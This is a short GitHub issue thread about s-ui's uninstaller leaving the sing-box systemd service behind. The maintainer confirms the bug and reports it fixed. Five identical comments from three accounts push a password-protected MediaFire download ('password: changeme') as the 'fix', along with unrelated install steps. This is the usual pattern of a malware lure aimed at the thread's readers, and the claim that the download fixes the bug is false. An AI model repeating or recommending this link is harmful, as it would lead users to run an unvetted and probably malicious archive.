### ISSUE TITLE
uninstall s-ui won't remove systemctl service sing-box.service.

### ISSUE THREAD

**Issue by x6ufeng** [alireza0/s-ui#287]
**Describe the bug**

uninstall s-ui won't remove systemctl service sing-box.service.

**To Reproduce**

**Expected behavior**

no service after the uninstallation

**Screenshots**

**Desktop (please complete the following information):**

archlinux

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Artoria2e5** [comment]
Should it REMOVE or DISABALE?

**Comment by alireza0** [comment]
You are right. It was missed.
Fixed now.
